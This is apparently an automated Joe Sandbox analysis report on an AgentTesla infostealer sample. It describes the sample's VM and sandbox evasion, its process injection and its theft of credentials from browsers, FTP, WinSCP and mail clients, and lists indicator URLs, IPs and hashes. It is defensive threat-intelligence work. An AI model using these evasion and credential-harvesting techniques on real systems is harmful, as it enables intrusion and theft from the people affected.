Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Window / User API: threadDelayed 1836			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Window / User API: threadDelayed 7959			Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe TID: 6492	Thread sleep time: -50947s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe TID: 6692	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe TID: 6708	Thread sleep count: 1836 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe TID: 6708	Thread sleep count: 7959 > 30	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe TID: 6692	Thread sleep count: 36 > 30	Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: AE-808_RAJEN.exe, 00000000.00000002.654041690.0000000000D36000.00000004.00000020.sdmp	Binary or memory string: VMware
Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	Binary or memory string: %l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AE-808_RAJEN.exe, 00000000.00000002.654041690.0000000000D36000.00000004.00000020.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareUN_ASN62Win32_VideoControllerO7X6AYD1VideoController120060621000000.000000-0007724726.display.infMSBDA__NMLRRMPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWG1TSHMA
Source: AE-808_RAJEN.exe, 00000001.00000003.866676188.0000000001730000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Use
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: AE-808_RAJEN.exe, 00000001.00000002.1033808650.0000000006380000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: AE-808_RAJEN.exe, 00000000.00000002.654041690.0000000000D36000.00000004.00000020.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareUN_ASN62Win32_VideoControllerO7X6AYD1VideoController120060621000000.000000-0007724726.display.infMSBDA__NMLRRMPCI\VEN_15AD&DEV_0405&U/3:Y
Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	Binary or memory string: %l"SOFTWARE\VMware, Inc.\VMware Tools
Source: AE-808_RAJEN.exe, 00000001.00000002.1033808650.0000000006380000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: AE-808_RAJEN.exe, 00000001.00000002.1033808650.0000000006380000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: AE-808_RAJEN.exe, 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: AE-808_RAJEN.exe, 00000001.00000002.1033808650.0000000006380000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Memory written: C:\Users\user\Desktop\AE-808_RAJEN.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Process created: C:\Users\user\Desktop\AE-808_RAJEN.exe C:\Users\user\Desktop\AE-808_RAJEN.exe

Jump to behavior

Source: AE-808_RAJEN.exe, 00000001.00000002.1031862191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: AE-808_RAJEN.exe, 00000001.00000002.1031862191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: AE-808_RAJEN.exe, 00000001.00000002.1031862191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: AE-808_RAJEN.exe, 00000001.00000002.1031862191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Users\user\Desktop\AE-808_RAJEN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Users\user\Desktop\AE-808_RAJEN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Code function: 1_2_064D54E4 GetUserNameW,

1_2_064D54E4

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.654908714.0000000003C86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 2912, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 6140, type: MEMORY
Source: Yara match	File source: 1.2.AE-808_RAJEN.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\AE-808_RAJEN.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 2912, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.654908714.0000000003C86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 2912, type: MEMORY
Source: Yara match	File source: Process Memory Space: AE-808_RAJEN.exe PID: 6140, type: MEMORY
Source: Yara match	File source: 1.2.AE-808_RAJEN.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation311	Path Interception	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information1	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Credentials in Registry1	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing2	NTDS	Security Software Discovery321	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion24	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion24	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
AE-808_RAJEN.exe	35%	Virustotal		Browse
AE-808_RAJEN.exe	37%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
AE-808_RAJEN.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.AE-808_RAJEN.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://EiR6SA0ya1Q.org	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://EiR6SA0ya1Q.or	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://api.lightboot.org/panel/index.php?page=Api&key=b6udeJ2WqDoyHKzzsEjfG3QajboCjeJv&host=	0%	Avira URL Cloud	safe
http://lOlcWJ.com	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
server116.web-hosting.com	68.65.122.156	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://EiR6SA0ya1Q.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://EiR6SA0ya1Q.or	AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://server116.web-hosting.com	AE-808_RAJEN.exe, 00000001.00000002.1032679809.00000000036A5000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.lightboot.org/panel/index.php?page=Api&key=b6udeJ2WqDoyHKzzsEjfG3QajboCjeJv&host=	AE-808_RAJEN.exe	false	Avira URL Cloud: safe	unknown
https://simpletimelapse.sourceforge.io/update/changelog.txt	AE-808_RAJEN.exe	false		high
http://lOlcWJ.com	AE-808_RAJEN.exe, 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://simpletimelapse.sourceforge.net/update/version.txt?Refresh=	AE-808_RAJEN.exe	false		high
https://ffmpeg.org	AE-808_RAJEN.exe	false		high
https://simpletimelapse.sourceforge.io/update/version.txt	AE-808_RAJEN.exe	false		high
https://www.flaticon.com/packs/free-basic-ui-elements	AE-808_RAJEN.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AE-808_RAJEN.exe, 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp	false		high
https://simpletimelapse.sourceforge.io/update/version.txtwhttps://simpletimelapse.sourceforge.io/upd	AE-808_RAJEN.exe	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	AE-808_RAJEN.exe, 00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp, AE-808_RAJEN.exe, 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
68.65.122.156	unknown	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344977
Start date:	27.01.2021
Start time:	15:17:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	AE-808_RAJEN.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 65.2% Quality standard deviation: 7.4%
HCA Information:	Successful, ratio: 95% Number of executed functions: 64 Number of non-executed functions: 6
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.147.198.201, 40.88.32.150, 13.64.90.137, 51.104.139.180, 95.101.22.216, 95.101.22.224, 52.155.217.156, 20.54.26.129, 95.101.27.163, 95.101.27.142, 51.104.144.132 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:18:03	API Interceptor	1107x Sleep call for process: AE-808_RAJEN.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
68.65.122.156	https://goldeded.website/?email=amltbXkuYnV0Y2hlckBraXdpYmFuay5jby5ueg==	Get hash	malicious	Browse
68.65.122.156	Adobe-SSPFShare.htm	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60
	quote20210126.exe.exe	Get hash	malicious	Browse	198.54.117.215
	MV TAN BINH 135.pdf.exe	Get hash	malicious	Browse	198.54.116.236
	IMG_155710.doc	Get hash	malicious	Browse	199.192.18.134
	bXFjrxjRlb.exe	Get hash	malicious	Browse	198.54.117.215
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	winlog(1).exe	Get hash	malicious	Browse	198.54.117.216
	Revise Bank Details_pdf.exe	Get hash	malicious	Browse	198.54.116.236
	SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exe	Get hash	malicious	Browse	198.187.31.7
	SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exe	Get hash	malicious	Browse	198.187.31.7
	Payment Swift Copy_USD 206,832,000.00.pdf.exe	Get hash	malicious	Browse	198.54.116.236
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	198.54.117.244
	DSksIiT85D.exe	Get hash	malicious	Browse	199.188.200.97
	file.exe	Get hash	malicious	Browse	198.54.116.236
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	104.219.248.112
	file.exe	Get hash	malicious	Browse	198.54.116.236
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	198.54.117.215
	74725794.exe	Get hash	malicious	Browse	198.54.122.60
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	198.54.117.212

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AE-808_RAJEN.exe.log Download File
Process:	C:\Users\user\Desktop\AE-808_RAJEN.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	5.341099307467139
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
MD5:	E5FA1A53BA6D70E18192AF6AF7CFDBFA
SHA1:	1C076481F11366751B8DA795C98A54DE8D1D82D5
SHA-256:	1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
SHA-512:	77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
Malicious:	true
Reputation:	moderate, very likely benign file
